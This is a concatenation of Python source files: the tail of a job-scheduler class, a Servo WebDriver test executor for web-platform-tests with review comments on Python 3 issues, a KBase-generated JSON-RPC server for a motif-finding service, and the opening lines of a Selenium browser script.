        """Start schedule. Returns False for unknown schedule/function."""
        if schedule_name not in self.schedules:
            return False
        if not self.schedules[schedule_name].hasFunction(function_name):
            return False
        self.schedules[schedule_name].start(function_name)
        return True

    def stop(self, schedule_name: str, function_name: str):
        """Stops schedule. Returns False for unknown schedule/function."""
        if schedule_name not in self.schedules:
            return False
        if not self.schedules[schedule_name].hasFunction(function_name):
            return False
        return self.schedules[schedule_name].stop(function_name)

    @staticmethod
    def _schedule_thread():
        """Worker loop: run pending jobs once a second, forever."""
        while True:
            try:
                schedule.run_pending()
            except Exception:
                # A bare `except:` also swallowed SystemExit and
                # KeyboardInterrupt; catch Exception only and keep the
                # traceback in the log.
                log.exception("Exception on scheduled task")
            time.sleep(1)

    def _importSchedules(self):
        """Instantiate a ScheduleFunction for each configured schedule module."""
        for s in self.config["schedules"]:
            mod = importlib.import_module(s["module"])
            sched = mod.ScheduleFunction(schedule, self.sequencer, s)
            self.schedules[s["name"]] = sched

    def start_thread(self):
        """Start the background scheduler thread (idempotent)."""
        if not self.active:
            # daemon=True replaces the deprecated setDaemon() call.
            self.thread = threading.Thread(target=self._schedule_thread,
                                           daemon=True)
            self.thread.start()
            # Mark the thread as running; previously this flag was never set,
            # so repeated calls spawned duplicate scheduler threads.
            self.active = True
executorservodriver.py
# Executors that drive Servo through its WebDriver server for
# web-platform-tests: a testharness executor and a reftest executor, plus the
# protocol plumbing they share.
#
# NOTE(review): this is Python-2-era code. ``async`` (used as a parameter
# name below) became a reserved keyword in Python 3.7, so this module will
# not even parse on modern Python; ``traceback.format_exc(e)`` also relies
# on the old ``limit`` positional parameter being tolerant of non-ints.
# Both need an upstream rename/cleanup before a Python 3 migration.
import json
import os
import socket
import threading
import time
import traceback

from .base import (Protocol,
                   BaseProtocolPart,
                   RefTestExecutor,
                   RefTestImplementation,
                   TestharnessExecutor,
                   strip_server)
from ..testrunner import Stop
from ..webdriver_server import wait_for_service

# Filled in lazily by do_delayed_imports() so importing this module does not
# require the ``webdriver`` package to be installed.
webdriver = None
ServoCommandExtensions = None

here = os.path.join(os.path.split(__file__)[0])

# Grace period (seconds) added on top of each test's own timeout.
extra_timeout = 5


def do_delayed_imports():
    """Import ``webdriver`` and define the Servo session extension lazily."""
    global webdriver
    import webdriver
    global ServoCommandExtensions

    class ServoCommandExtensions(object):
        """Servo-specific WebDriver session commands (pref get/set/reset)."""

        def __init__(self, session):
            self.session = session

        @webdriver.client.command
        def get_prefs(self, *prefs):
            body = {"prefs": list(prefs)}
            return self.session.send_session_command("POST", "servo/prefs/get", body)

        @webdriver.client.command
        def set_prefs(self, prefs):
            body = {"prefs": prefs}
            return self.session.send_session_command("POST", "servo/prefs/set", body)

        @webdriver.client.command
        def reset_prefs(self, *prefs):
            body = {"prefs": list(prefs)}
            return self.session.send_session_command("POST", "servo/prefs/reset", body)

        def change_prefs(self, old_prefs, new_prefs):
            # Servo interprets reset with an empty list as reset everything
            if old_prefs:
                self.reset_prefs(*old_prefs.keys())
            self.set_prefs({k: parse_pref_value(v) for k, v in new_prefs.items()})


# See parse_pref_from_command_line() in components/config/opts.rs
def parse_pref_value(value):
    # Strings "true"/"false" become booleans, numeric strings become floats,
    # anything else is passed through unchanged.
    if value == "true":
        return True
    if value == "false":
        return False
    try:
        return float(value)
    except ValueError:
        return value


class ServoBaseProtocolPart(BaseProtocolPart):
    """No-op protocol part; Servo's executors drive the session directly."""

    # NOTE(review): ``async`` is a reserved word from Python 3.7 onward —
    # this parameter must be renamed for Python 3 compatibility.
    def execute_script(self, script, async=False):
        pass

    def set_timeout(self, timeout):
        pass

    def wait(self):
        pass

    def set_window(self, handle):
        pass


class ServoWebDriverProtocol(Protocol):
    """Connection to Servo's WebDriver server for a single browser instance."""

    implements = [ServoBaseProtocolPart]

    def __init__(self, executor, browser, capabilities, **kwargs):
        do_delayed_imports()
        Protocol.__init__(self, executor, browser)
        self.capabilities = capabilities
        self.host = browser.webdriver_host
        self.port = browser.webdriver_port
        self.init_timeout = browser.init_timeout
        self.session = None

    def connect(self):
        """Connect to browser via WebDriver."""
        # Block until the WebDriver port is accepting connections, then open
        # a session augmented with the Servo pref commands.
        wait_for_service((self.host, self.port), timeout=self.init_timeout)
        self.session = webdriver.Session(self.host, self.port,
                                         extension=ServoCommandExtensions)
        self.session.start()

    def after_connect(self):
        pass

    def teardown(self):
        # Best-effort session shutdown; the browser may already be gone.
        self.logger.debug("Hanging up on WebDriver session")
        try:
            self.session.end()
        except Exception:
            pass

    def is_alive(self):
        """Return True when the session still answers a trivial query."""
        try:
            # Get a simple property over the connection
            self.session.window_handle
            # TODO what exception?
        except Exception:
            return False
        return True

    def wait(self):
        # Park the session until the connection drops or an error occurs.
        while True:
            try:
                self.session.execute_async_script("")
            except webdriver.TimeoutException:
                pass
            except (socket.timeout, IOError):
                break
            except Exception as e:
                # NOTE(review): format_exc takes no exception argument in
                # Python 3; presumably format_exc() was intended — confirm.
                self.logger.error(traceback.format_exc(e))
                break


class ServoWebDriverRun(object):
    """Run one session operation on a worker thread with a hard timeout.

    ``run()`` returns a (success, data) pair; on timeout the pair is
    (False, ("EXTERNAL-TIMEOUT", None)).
    """

    def __init__(self, func, session, url, timeout, current_timeout=None):
        self.func = func
        self.result = None
        self.session = session
        self.url = url
        self.timeout = timeout
        self.result_flag = threading.Event()

    def run(self):
        executor = threading.Thread(target=self._run)
        executor.start()

        # Wait for the worker, allowing the shared grace period on top of
        # the test timeout before declaring an external timeout.
        flag = self.result_flag.wait(self.timeout + extra_timeout)
        if self.result is None:
            assert not flag
            self.result = False, ("EXTERNAL-TIMEOUT", None)

        return self.result

    def _run(self):
        # Translate the various failure modes into wptrunner statuses.
        try:
            self.result = True, self.func(self.session, self.url, self.timeout)
        except webdriver.TimeoutException:
            self.result = False, ("EXTERNAL-TIMEOUT", None)
        except (socket.timeout, IOError):
            self.result = False, ("CRASH", None)
        except Exception as e:
            message = getattr(e, "message", "")
            if message:
                message += "\n"
            # NOTE(review): same format_exc(e) issue as above.
            message += traceback.format_exc(e)
            self.result = False, ("INTERNAL-ERROR", e)
        finally:
            self.result_flag.set()


def timeout_func(timeout):
    """Return a zero-arg callable reporting whether *timeout* has elapsed.

    A falsy timeout yields a callable that is always False (no deadline).
    """
    if timeout:
        t0 = time.time()
        return lambda: time.time() - t0 > timeout + extra_timeout
    else:
        return lambda: False


class ServoWebDriverTestharnessExecutor(TestharnessExecutor):
    """Run testharness.js tests in Servo over WebDriver."""

    def __init__(self, browser, server_config, timeout_multiplier=1,
                 close_after_done=True, capabilities=None, debug_info=None,
                 **kwargs):
        # NOTE(review): timeout_multiplier and debug_info are forwarded as
        # the literals 1 and None rather than the received arguments —
        # looks like a bug upstream; confirm before relying on them.
        TestharnessExecutor.__init__(self, browser, server_config,
                                     timeout_multiplier=1,
                                     debug_info=None)
        self.protocol = ServoWebDriverProtocol(self, browser,
                                               capabilities=capabilities)
        with open(os.path.join(here, "testharness_servodriver.js")) as f:
            self.script = f.read()
        # Last script timeout pushed to the session; used to avoid
        # re-sending the same value for every test.
        self.timeout = None

    def on_protocol_change(self, new_protocol):
        pass

    def is_alive(self):
        return self.protocol.is_alive()

    def do_test(self, test):
        url = self.test_url(test)

        timeout = test.timeout * self.timeout_multiplier + extra_timeout

        # Only update the session's script timeout when it changed.
        if timeout != self.timeout:
            try:
                self.protocol.session.timeouts.script = timeout
                self.timeout = timeout
            except IOError:
                self.logger.error("Lost webdriver connection")
                return Stop

        success, data = ServoWebDriverRun(self.do_testharness,
                                          self.protocol.session,
                                          url,
                                          timeout).run()

        if success:
            return self.convert_result(test, data)

        # Failure: ``data`` is a (status, message) pair for result_cls.
        return (test.result_cls(*data), [])

    def do_testharness(self, session, url, timeout):
        # Navigate, inject the harness driver script, and parse its JSON
        # result payload.
        session.url = url
        result = json.loads(
            session.execute_async_script(
                self.script % {"abs_url": url,
                               "url": strip_server(url),
                               "timeout_multiplier": self.timeout_multiplier,
                               "timeout": timeout * 1000}))
        # Prevent leaking every page in history until Servo develops a more sane
        # page cache
        session.back()
        return result

    def on_environment_change(self, new_environment):
        # Apply pref deltas between the previous and the new environment.
        self.protocol.session.extension.change_prefs(
            self.last_environment.get("prefs", {}),
            new_environment.get("prefs", {})
        )


class TimeoutError(Exception):
    # NOTE(review): shadows the builtin TimeoutError on Python 3.3+.
    pass


class ServoWebDriverRefTestExecutor(RefTestExecutor):
    def __init__(self, browser, server_config, timeout_multiplier=1,
                 screenshot_cache=None, capabilities=None, debug_info=None,
                 **kwargs):
        """Selenium WebDriver-based executor for reftests"""
        RefTestExecutor.__init__(self,
                                 browser,
                                 server_config,
                                 screenshot_cache=screenshot_cache,
                                 timeout_multiplier=timeout_multiplier,
                                 debug_info=debug_info)
        self.protocol = ServoWebDriverProtocol(self, browser,
                                               capabilities=capabilities)
        self.implementation = RefTestImplementation(self)
        self.timeout = None
        with open(os.path.join(here, "reftest-wait_webdriver.js")) as f:
            self.wait_script = f.read()

    def is_alive(self):
        return self.protocol.is_alive()

    def do_test(self, test):
        # Map exception classes onto wptrunner result statuses.
        try:
            result = self.implementation.run_test(test)
            return self.convert_result(test, result)
        except IOError:
            return test.result_cls("CRASH", None), []
        except TimeoutError:
            return test.result_cls("TIMEOUT", None), []
        except Exception as e:
            message = getattr(e, "message", "")
            if message:
                message += "\n"
            # NOTE(review): same format_exc(e) issue as above.
            message += traceback.format_exc(e)
            return test.result_cls("INTERNAL-ERROR", message), []

    def screenshot(self, test, viewport_size, dpi):
        # https://github.com/w3c/wptrunner/issues/166
        assert viewport_size is None
        assert dpi is None

        # No deadline at all when running under a debugger.
        timeout = (test.timeout * self.timeout_multiplier + extra_timeout
                   if self.debug_info is None else None)

        if self.timeout != timeout:
            try:
                self.protocol.session.timeouts.script = timeout
                self.timeout = timeout
            except IOError:
                self.logger.error("Lost webdriver connection")
                return Stop

        return ServoWebDriverRun(self._screenshot,
                                 self.protocol.session,
                                 self.test_url(test),
                                 timeout).run()

    def _screenshot(self, session, url, timeout):
        # Load the page, wait for reftest-wait to clear, then capture.
        session.url = url

        session.execute_async_script(self.wait_script)

        return session.screenshot()

    def on_environment_change(self, new_environment):
        # Apply pref deltas between the previous and the new environment.
        self.protocol.session.extension.change_prefs(
            self.last_environment.get("prefs", {}),
            new_environment.get("prefs", {})
        )
MotifFinderSamplerServer.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# KBase SDK-generated JSON-RPC 1.1 WSGI server for the MotifFinderSampler
# module: dispatches RPC calls to MotifFinderSamplerImpl, handling auth,
# logging, provenance and error envelopes.
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server

import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
    JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError

from biokbase import log
from MotifFinderSampler.authclient import KBaseAuth as _KBaseAuth

# Python 2/3 compatibility for the config parser import.
try:
    from ConfigParser import ConfigParser
except ImportError:
    from configparser import ConfigParser

# Environment variable names and config key for deployment settings.
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'

# Note that the error fields do not match the 2.0 JSONRPC spec


def get_config_file():
    """Return the deployment config file path from the environment, or None."""
    return environ.get(DEPLOY, None)


def get_service_name():
    """Return the service name from the environment, or None."""
    return environ.get(SERVICE, None)


def get_config():
    """Read this service's section of the deployment config into a dict."""
    if not get_config_file():
        return None
    retconfig = {}
    config = ConfigParser()
    config.read(get_config_file())
    for nameval in config.items(get_service_name() or 'MotifFinderSampler'):
        retconfig[nameval[0]] = nameval[1]
    return retconfig

config = get_config()

# The implementation module is imported after config is loaded because its
# constructor takes the config.
from MotifFinderSampler.MotifFinderSamplerImpl import MotifFinderSampler  # noqa @IgnorePep8
impl_MotifFinderSampler = MotifFinderSampler(config)


class JSONObjectEncoder(json.JSONEncoder):
    """JSON encoder that also handles sets, frozensets and objects
    exposing a toJSONable() method."""

    def default(self, obj):
        if isinstance(obj, set):
            return list(obj)
        if isinstance(obj, frozenset):
            return list(obj)
        if hasattr(obj, 'toJSONable'):
            return obj.toJSONable()
        return json.JSONEncoder.default(self, obj)


class JSONRPCServiceCustom(JSONRPCService):
    """JSONRPCService variant that threads a MethodContext (``ctx``)
    through every dispatched method call."""

    def call(self, ctx, jsondata):
        """
        Calls jsonrpc service's method and returns its return value in a JSON
        string or None if there is none.

        Arguments:
        jsondata -- remote method call in jsonrpc format
        """
        result = self.call_py(ctx, jsondata)
        if result is not None:
            return json.dumps(result, cls=JSONObjectEncoder)

        return None

    def _call_method(self, ctx, request):
        """Calls given method with given params and returns it value."""
        method = self.method_data[request['method']]['method']
        params = request['params']
        result = None
        try:
            if isinstance(params, list):
                # Does it have enough arguments?
                # The "- 1" accounts for ctx, which the client never sends.
                if len(params) < self._man_args(method) - 1:
                    raise InvalidParamsError('not enough arguments')
                # Does it have too many arguments?
                if(not self._vargs(method) and len(params) >
                        self._max_args(method) - 1):
                    raise InvalidParamsError('too many arguments')

                result = method(ctx, *params)
            elif isinstance(params, dict):
                # Do not accept keyword arguments if the jsonrpc version is
                # not >=1.1.
                if request['jsonrpc'] < 11:
                    raise KeywordError

                result = method(ctx, **params)
            else:  # No params
                result = method(ctx)
        except JSONRPCError:
            raise
        except Exception as e:
            # log.exception('method %s threw an exception' % request['method'])
            # Exception was raised inside the method.
            # Wrap the implementation error in a JSON-RPC server error
            # carrying the traceback and the original exception args.
            newerr = JSONServerError()
            newerr.trace = traceback.format_exc()
            if len(e.args) == 1:
                newerr.data = repr(e.args[0])
            else:
                newerr.data = repr(e.args)
            raise newerr
        return result

    def call_py(self, ctx, jsondata):
        """
        Calls jsonrpc service's method and returns its return value in python
        object format or None if there is none.

        This method is same as call() except the return value is a python
        object instead of JSON string. This method is mainly only useful for
        debugging purposes.
        """
        rdata = jsondata
        # we already deserialize the json string earlier in the server code, no
        # need to do it again
        #        try:
        #            rdata = json.loads(jsondata)
        #        except ValueError:
        #            raise ParseError

        # set some default values for error handling
        request = self._get_default_vals()

        if isinstance(rdata, dict) and rdata:
            # It's a single request.
            self._fill_request(request, rdata)
            respond = self._handle_request(ctx, request)

            # Don't respond to notifications
            if respond is None:
                return None

            return respond
        elif isinstance(rdata, list) and rdata:
            # It's a batch.
            requests = []
            responds = []
            for rdata_ in rdata:
                # set some default values for error handling
                request_ = self._get_default_vals()
                self._fill_request(request_, rdata_)
                requests.append(request_)

            for request_ in requests:
                respond = self._handle_request(ctx, request_)
                # Don't respond to notifications
                if respond is not None:
                    responds.append(respond)

            if responds:
                return responds

            # Nothing to respond.
            return None
        else:  # empty dict, list or wrong type
            raise InvalidRequestError

    def _handle_request(self, ctx, request):
        """Handles given request and returns its response."""
        if 'types' in self.method_data[request['method']]:
            self._validate_params_types(request['method'], request['params'])

        result = self._call_method(ctx, request)

        # Do not respond to notifications.
        if request['id'] is None:
            return None

        respond = {}
        self._fill_ver(request['jsonrpc'], respond)
        respond['result'] = result
        respond['id'] = request['id']

        return respond


class MethodContext(dict):
    """Per-call context dict (client IP, user, token, provenance, ...)
    passed as the first argument to every implementation method."""

    def __init__(self, logger):
        self['client_ip'] = None
        self['user_id'] = None
        self['authenticated'] = None
        self['token'] = None
        self['module'] = None
        self['method'] = None
        self['call_id'] = None
        self['rpc_context'] = None
        self['provenance'] = None
        # Levels accepted verbatim by log_debug; others map 1-3 -> 7-9.
        self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
        self._logger = logger

    def log_err(self, message):
        self._log(log.ERR, message)

    def log_info(self, message):
        self._log(log.INFO, message)

    def log_debug(self, message, level=1):
        if level in self._debug_levels:
            pass
        else:
            level = int(level)
            if level < 1 or level > 3:
                raise ValueError("Illegal log level: " + str(level))
            level = level + 6
        self._log(level, message)

    def set_log_level(self, level):
        self._logger.set_log_level(level)

    def get_log_level(self):
        return self._logger.get_log_level()

    def clear_log_level(self):
        self._logger.clear_user_log_level()

    def _log(self, level, message):
        # Forward to the biokbase logger with the call's identifying fields.
        self._logger.log_message(level, message, self['client_ip'],
                                 self['user_id'], self['module'],
                                 self['method'], self['call_id'])

    def provenance(self):
        """Return provenance for this call, querying the callback server
        when one is configured, else the locally stored value."""
        callbackURL = os.environ.get('SDK_CALLBACK_URL')
        if callbackURL:
            # OK, there's a callback server from which we can get provenance
            arg_hash = {'method': 'CallbackServer.get_provenance',
                        'params': [],
                        'version': '1.1',
                        'id': str(_random.random())[2:]
                        }
            body = json.dumps(arg_hash)
            response = _requests.post(callbackURL, data=body,
                                      timeout=60)
            response.encoding = 'utf-8'
            if response.status_code == 500:
                if ('content-type' in response.headers and
                        response.headers['content-type'] ==
                        'application/json'):
                    err = response.json()
                    if 'error' in err:
                        raise ServerError(**err['error'])
                    else:
                        raise ServerError('Unknown', 0, response.text)
                else:
                    raise ServerError('Unknown', 0, response.text)
            if not response.ok:
                response.raise_for_status()
            resp = response.json()
            if 'result' not in resp:
                raise ServerError('Unknown', 0,
                                  'An unknown server error occurred')
            return resp['result'][0]
        else:
            return self.get('provenance')


class ServerError(Exception):
    '''
    The call returned an error. Fields:
    name - the name of the error.
    code - the error code.
    message - a human readable error message.
    data - the server side stacktrace.
    '''

    def __init__(self, name, code, message, data=None, error=None):
        super(Exception, self).__init__(message)
        self.name = name
        self.code = code
        self.message = message if message else ''
        self.data = data or error or ''
        # data = JSON RPC 2.0, error = 1.1

    def __str__(self):
        return self.name + ': ' + str(self.code) + '. ' + self.message + \
            '\n' + self.data


def getIPAddress(environ):
    """Determine the client IP, honouring X-Forwarded-For / X-Real-IP
    headers unless the config says not to trust them."""
    xFF = environ.get('HTTP_X_FORWARDED_FOR')
    realIP = environ.get('HTTP_X_REAL_IP')
    trustXHeaders = config is None or \
        config.get('dont_trust_x_ip_headers') != 'true'

    if (trustXHeaders):
        if (xFF):
            return xFF.split(',')[0].strip()
        if (realIP):
            return realIP.strip()
    return environ.get('REMOTE_ADDR')


class Application(object):
    # Wrap the wsgi handler in a class definition so that we can
    # do some initialization and avoid regenerating stuff over
    # and over

    def logcallback(self):
        # Keep the server log writing to the same file as the user log.
        self.serverlog.set_log_file(self.userlog.get_log_file())

    def log(self, level, context, message):
        self.serverlog.log_message(level, message, context['client_ip'],
                                   context['user_id'], context['module'],
                                   context['method'], context['call_id'])

    def __init__(self):
        submod = get_service_name() or 'MotifFinderSampler'
        self.userlog = log.log(
            submod, ip_address=True, authuser=True, module=True, method=True,
            call_id=True, changecallback=self.logcallback,
            config=get_config_file())
        self.serverlog = log.log(
            submod, ip_address=True, authuser=True, module=True, method=True,
            call_id=True, logfile=self.userlog.get_log_file())
        self.serverlog.set_log_level(6)
        self.rpc_service = JSONRPCServiceCustom()
        # Map of RPC method name -> auth requirement ('required'/'optional').
        self.method_authentication = dict()
        self.rpc_service.add(impl_MotifFinderSampler.find_motifs,
                             name='MotifFinderSampler.find_motifs',
                             types=[dict])
        self.method_authentication['MotifFinderSampler.find_motifs'] = 'required'  # noqa
        self.rpc_service.add(impl_MotifFinderSampler.BuildFastaFromSequenceSet,
                             name='MotifFinderSampler.BuildFastaFromSequenceSet',
                             types=[dict])
        self.method_authentication['MotifFinderSampler.BuildFastaFromSequenceSet'] = 'required'  # noqa
        self.rpc_service.add(impl_MotifFinderSampler.ExtractPromotersFromFeatureSetandDiscoverMotifs,
                             name='MotifFinderSampler.ExtractPromotersFromFeatureSetandDiscoverMotifs',
                             types=[dict])
        self.method_authentication['MotifFinderSampler.ExtractPromotersFromFeatureSetandDiscoverMotifs'] = 'required'  # noqa
        self.rpc_service.add(impl_MotifFinderSampler.DiscoverMotifsFromFasta,
                             name='MotifFinderSampler.DiscoverMotifsFromFasta',
                             types=[dict])
        self.method_authentication['MotifFinderSampler.DiscoverMotifsFromFasta'] = 'required'  # noqa
        self.rpc_service.add(impl_MotifFinderSampler.DiscoverMotifsFromSequenceSet,
                             name='MotifFinderSampler.DiscoverMotifsFromSequenceSet',
                             types=[dict])
        self.method_authentication['MotifFinderSampler.DiscoverMotifsFromSequenceSet'] = 'required'  # noqa
        self.rpc_service.add(impl_MotifFinderSampler.status,
                             name='MotifFinderSampler.status',
                             types=[dict])
        authurl = config.get(AUTH) if config else None
        self.auth_client = _KBaseAuth(authurl)

    def __call__(self, environ, start_response):
        # WSGI entry point: parse the JSON-RPC request, authenticate,
        # dispatch, and wrap any failure in a JSON-RPC error envelope.
        # Context object, equivalent to the perl impl CallContext
        ctx = MethodContext(self.userlog)
        ctx['client_ip'] = getIPAddress(environ)
        status = '500 Internal Server Error'

        try:
            body_size = int(environ.get('CONTENT_LENGTH', 0))
        except (ValueError):
            body_size = 0
        if environ['REQUEST_METHOD'] == 'OPTIONS':
            # we basically do nothing and just return headers
            status = '200 OK'
            rpc_result = ""
        else:
            request_body = environ['wsgi.input'].read(body_size)
            try:
                req = json.loads(request_body)
            except ValueError as ve:
                err = {'error': {'code': -32700,
                                 'name': "Parse error",
                                 'message': str(ve),
                                 }
                       }
                rpc_result = self.process_error(err, ctx, {'version': '1.1'})
            else:
                ctx['module'], ctx['method'] = req['method'].split('.')
                ctx['call_id'] = req['id']
                ctx['rpc_context'] = {
                    'call_stack': [{'time': self.now_in_utc(),
                                    'method': req['method']}
                                   ]
                }
                prov_action = {'service': ctx['module'],
                               'method': ctx['method'],
                               'method_params': req['params']
                               }
                ctx['provenance'] = [prov_action]
                try:
                    token = environ.get('HTTP_AUTHORIZATION')
                    # parse out the method being requested and check if it
                    # has an authentication requirement
                    method_name = req['method']
                    auth_req = self.method_authentication.get(
                        method_name, 'none')
                    if auth_req != 'none':
                        if token is None and auth_req == 'required':
                            err = JSONServerError()
                            err.data = (
                                'Authentication required for ' +
                                'MotifFinderSampler ' +
                                'but no authentication header was passed')
                            raise err
                        elif token is None and auth_req == 'optional':
                            pass
                        else:
                            try:
                                user = self.auth_client.get_user(token)
                                ctx['user_id'] = user
                                ctx['authenticated'] = 1
                                ctx['token'] = token
                            except Exception as e:
                                if auth_req == 'required':
                                    err = JSONServerError()
                                    err.data = \
                                        "Token validation failed: %s" % e
                                    raise err
                    if (environ.get('HTTP_X_FORWARDED_FOR')):
                        self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
                                 environ.get('HTTP_X_FORWARDED_FOR'))
                    self.log(log.INFO, ctx, 'start method')
                    rpc_result = self.rpc_service.call(ctx, req)
                    self.log(log.INFO, ctx, 'end method')
                    status = '200 OK'
                except JSONRPCError as jre:
                    err = {'error': {'code': jre.code,
                                     'name': jre.message,
                                     'message': jre.data
                                     }
                           }
                    trace = jre.trace if hasattr(jre, 'trace') else None
                    rpc_result = self.process_error(err, ctx, req, trace)
                except Exception:
                    err = {'error': {'code': 0,
                                     'name': 'Unexpected Server Error',
                                     'message': 'An unexpected server error ' +
                                                'occurred',
                                     }
                           }
                    rpc_result = self.process_error(err, ctx, req,
                                                    traceback.format_exc())

        # print('Request method was %s\n' % environ['REQUEST_METHOD'])
        # print('Environment dictionary is:\n%s\n' % pprint.pformat(environ))
        # print('Request body was: %s' % request_body)
        # print('Result from the method call is:\n%s\n' % \
        #    pprint.pformat(rpc_result))

        if rpc_result:
            response_body = rpc_result
        else:
            response_body = ''

        response_headers = [
            ('Access-Control-Allow-Origin', '*'),
            ('Access-Control-Allow-Headers', environ.get(
                'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
            ('content-type', 'application/json'),
            ('content-length', str(len(response_body)))]
        start_response(status, response_headers)
        return [response_body.encode('utf8')]

    def process_error(self, error, context, request, trace=None):
        """Attach ids/version/trace to an error envelope per the request's
        JSON-RPC dialect and return it serialized to JSON."""
        if trace:
            self.log(log.ERR, context, trace.split('\n')[0:-1])

        if 'id' in request:
            error['id'] = request['id']

        if 'version' in request:
            error['version'] = request['version']
            e = error['error'].get('error')
            if not e:
                error['error']['error'] = trace
        elif 'jsonrpc' in request:
            error['jsonrpc'] = request['jsonrpc']
            error['error']['data'] = trace
        else:
            error['version'] = '1.0'
            error['error']['error'] = trace

        return json.dumps(error)

    def now_in_utc(self):
        """Return the local time as an ISO string with UTC offset."""
        # noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
        dtnow = datetime.datetime.now()
        dtutcnow = datetime.datetime.utcnow()
        delta = dtnow - dtutcnow
        hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
                        60)
        return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)

application = Application()

# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
    import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
    if config is not None and config.get('gevent_monkeypatch_all', False):
        print("Monkeypatching std libraries for async")
        from gevent import monkey
        monkey.patch_all()
    uwsgi.applications = {'': application}
except ImportError:
    # Not available outside of wsgi, ignore
    pass

# Handle of the child server process when start_server(newprocess=True).
_proc = None


def start_server(host='localhost', port=0, newprocess=False):
    '''
    By default, will start the server on localhost on a system assigned port
    in the main thread. Execution of the main thread will stay in the server
    main loop until interrupted. To run the server in a separate process, and
    thus allow the stop_server method to be called, set newprocess = True. This
    will also allow returning of the port number.'''
    global _proc
    if _proc:
        raise RuntimeError('server is already running')
    httpd = make_server(host, port, application)
    port = httpd.server_address[1]
    print("Listening on port %s" % port)
    if newprocess:
        _proc = Process(target=httpd.serve_forever)
        _proc.daemon = True
        _proc.start()
    else:
        httpd.serve_forever()
    return port


def stop_server():
    """Terminate the child server process started by start_server."""
    global _proc
    _proc.terminate()
    _proc = None


def process_async_cli(input_file_path, output_file_path, token):
    """Run a single RPC read from a JSON file and write the response to
    another file; returns 500 on error, 0 otherwise (used as exit code)."""
    exit_code = 0
    with open(input_file_path) as data_file:
        req = json.load(data_file)
    if 'version' not in req:
        req['version'] = '1.1'
    if 'id' not in req:
        req['id'] = str(_random.random())[2:]
    ctx = MethodContext(application.userlog)
    if token:
        user = application.auth_client.get_user(token)
        ctx['user_id'] = user
        ctx['authenticated'] = 1
        ctx['token'] = token
    if 'context' in req:
        ctx['rpc_context'] = req['context']
    ctx['CLI'] = 1
    ctx['module'], ctx['method'] = req['method'].split('.')
    prov_action = {'service': ctx['module'], 'method': ctx['method'],
                   'method_params': req['params']}
    ctx['provenance'] = [prov_action]
    resp = None
    try:
        resp = application.rpc_service.call_py(ctx, req)
    except JSONRPCError as jre:
        trace = jre.trace if hasattr(jre, 'trace') else None
        resp = {'id': req['id'],
                'version': req['version'],
                'error': {'code': jre.code,
                          'name': jre.message,
                          'message': jre.data,
                          'error': trace}
                }
    except Exception:
        trace = traceback.format_exc()
        resp = {'id': req['id'],
                'version': req['version'],
                'error': {'code': 0,
                          'name': 'Unexpected Server Error',
                          'message': 'An unexpected server error occurred',
                          'error': trace}
                }
    if 'error' in resp:
        exit_code = 500
    with open(output_file_path, "w") as f:
        f.write(json.dumps(resp, cls=JSONObjectEncoder))
    return exit_code


if __name__ == "__main__":
    # CLI mode: ``server.py input.json output.json [token|tokenfile]`` runs
    # one async call; otherwise start the HTTP server (--port/--host).
    if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
            os.path.isfile(sys.argv[1])):
        token = None
        if len(sys.argv) == 4:
            if os.path.isfile(sys.argv[3]):
                with open(sys.argv[3]) as token_file:
                    token = token_file.read()
            else:
                token = sys.argv[3]
        sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
    try:
        opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
    except GetoptError as err:
        # print help information and exit:
        print(str(err))  # will print something like "option -a not recognized"
        sys.exit(2)
    port = 9999
    host = 'localhost'
    for o, a in opts:
        if o == '--port':
            port = int(a)
        elif o == '--host':
            host = a
            print("Host set to %s" % host)
        else:
            assert False, "unhandled option"
    start_server(host=host, port=port)
    # print("Listening on port %s" % port)
    # httpd = make_server( host, port, application)
    #
    # httpd.serve_forever()
browser.py
'''

Copyright (c) 2019 Vanessa Sochat

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

'''

from selenium.common.exceptions import TimeoutException
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.keys import Keys
from random import choice
from threading import Thread
from selenium import webdriver
from http.server import SimpleHTTPRequestHandler
